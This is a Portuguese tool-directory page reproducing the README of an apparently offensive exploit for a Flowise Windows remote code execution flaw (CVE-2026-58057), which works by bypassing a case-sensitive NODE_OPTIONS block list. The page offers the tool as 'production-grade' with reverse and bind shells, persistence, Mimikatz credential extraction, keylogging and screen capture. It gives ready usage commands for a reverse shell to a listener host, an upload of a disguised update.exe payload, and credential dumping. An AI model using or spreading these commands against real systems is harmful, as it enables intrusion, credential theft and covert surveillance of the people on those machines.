Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Flowise-CVE-2026-58057-exploit — Exploit de RCE no Windows da Flowise para a CVE-2026-58057. Contorna a validação de variáveis de ambiente através de uma falha de sensibilidade a maiúsculas/minúsculas. Usa node_options para injetar código arbitrário via MCP stdio. Suporta reverse shell, persistência, upload de arquivos e extração de credenciais. Apenas para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/cerberusmrxi/flowise-cve-2026-58057-exploit
Mecanismos de PersistênciaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesPós-ExploraçãoTestes de PenetraçãoComando e Controle
Red Teaming
Desenvolvimento de Payloads
GitHubcerberusmrxi/flowise-cve-2026-58057-exploit

Flowise-CVE-2026-58057-exploit

Ver Repositório
122há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Exploit de RCE no Windows da Flowise para a CVE-2026-58057. Contorna a validação de variáveis de ambiente através de uma falha de sensibilidade a maiúsculas/minúsculas. Usa node_options para injetar código arbitrário via MCP stdio. Suporta reverse shell, persistência, upload de arquivos e extração de credenciais. Apenas para testes de segurança autorizados.

Compartilhar

Flowise CVE-2026-58057 - Exploit de Execução Remota de Código no Windows

Project Badge CVE Badge Author Badge Version Badge CVSS Score Badge Affected Versions Badge Fixed Version Badge

📋 Visão Geral

Este é um exploit de nível de produção para CVE-2026-58057, uma vulnerabilidade crítica de Execução Remota de Código no Flowise em plataformas Windows. A vulnerabilidade decorre da validação de variáveis de ambiente que diferencia maiúsculas de minúsculas e que não consegue bloquear node_options em minúsculas, permitindo que atacantes contornem a lista de bloqueio NODE_OPTIONS e executem código arbitrário por meio da configuração Custom MCP stdio.

O exploit demonstra práticas profissionais de engenharia de software, com arquitetura modular, tratamento abrangente de erros e suporte a múltiplos tipos de payload.

f1

f2

⚠️ Aviso Legal

IMPORTANTE: Esta ferramenta é fornecida apenas para testes de segurança autorizados, testes de penetração e fins educacionais. O autor não é responsável por qualquer uso indevido ou dano causado por este software. Sempre obtenha autorização adequada antes de testar qualquer sistema.

🔍 Detalhes Técnicos

Causa Raiz da Vulnerabilidade

# Vulnerable Validation (Case-Sensitive )
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key in dangerous:  # Only blocks exact uppercase match
    raise ValueError(f"Modification not allowed")

Mecanismo do Exploit

  1. O atacante autentica no Flowise

  2. Cria/Modifica o nó Custom MCP stdio

  3. Injeta a variável de ambiente node_options em minúsculas

  4. Define o valor como --require malicious-loader.js

  5. O Node.js executa o loader quando o MCP stdio é executado

  6. Execução de código arbitrário é alcançada

✨ Recursos

Principais Capacidades

  • ✅ Reverse Shell - Conecta de volta à máquina do atacante

  • ✅ Bind Shell - Abre porta de escuta no alvo

  • ✅ Execução de Comandos - Executa comandos arbitrários do sistema

  • ✅ Upload de Arquivos - Envia arquivos para o sistema alvo

  • ✅ Persistência - Múltiplos mecanismos de persistência

  • ✅ Coleta de Informações - Coleta informações do sistema

  • ✅ Extração de Credenciais - Integração com Mimikatz

  • ✅ Captura de Tela - Captura telas da área de trabalho

  • ✅ Keylogger - Instala capacidade de registro de teclas

Recursos Técnicos

  • 🔐 Múltiplos Métodos de Autenticação - Chave de API ou usuário/senha

  • 🔄 Lógica de Nova Tentativa Automática - Resiliente a problemas de rede

  • 🧹 Autolimpeza - Remove arquivos de loader do alvo

  • 🌐 Multiplataforma - Funciona em Windows/Linux/macOS

  • 🎨 Saída Colorida - Legibilidade aprimorada

  • 📊 Depuração Detalhada - Registro detalhado para solução de problemas

📦 Instalação

Pré-requisitos

  • Python 3.6 ou superior

  • pip (gerenciador de pacotes do Python)

Instalação Rápida

# Clone repository
git clone https://github.com/CerberusMrXi/Flowise-CVE-2026-58057-exploit
cd Flowise-CVE-2026-58057-exploit

# Install dependencies
pip install -r requirements.txt

# Or minimal installation
pip install requests urllib3

Instalação via Docker (Opcional )

FROM python:3.9-alpine
RUN apk add --no-cache gcc musl-dev
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY exploit.py .
ENTRYPOINT ["python3", "exploit.py"]

🚀 Uso

Opções de Linha de Comando

python3 exploit.py --help

Opções de Autenticação

OpçãoDescriçãoExemplo
-t, --targetURL do Flowise (Obrigatório)http://localhost:3000
-k, --api-keyChave de API do Flowiseflowise_abc123...
-u, --usernameNome de usuárioadmin
-p, --passwordSenhapassword123

Opções de Payload

OpçãoDescriçãoExemplo
--payloadTipo de payloadreverse_shell
--lhostHost do listener192.168.1.100
--lportPorta do listener4444
--commandComando a executarwhoami
--local-fileArquivo para enviarpayload.exe
--remote-pathCaminho remoto de salvamentoC:\\Temp\\update.exe

Opções de Execução

OpçãoDescrição
--interactiveIniciar shell interativo
--verboseAtivar saída de depuração
--timeoutTempo limite da requisição em segundos
--retriesNúmero de tentativas

📝 Exemplos de Uso

1. Reverse Shell Básico

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444

2. Reverse Shell Interativo

python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444 \
    --interactive

3. Execução de Comandos

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload command_exec \
    --command "whoami"

4. Upload de Arquivos

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload file_upload \
    --local-file /path/to/payload.exe \
    --remote-path "C:\\ProgramData\\update.exe"

5. Extração de Credenciais (Mimikatz )

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload mimikatz

6. Instalação de Persistência

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload persistence

7. Coleta de Informações

python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload info_gather

8. Captura de Tela

Baixar ferramenta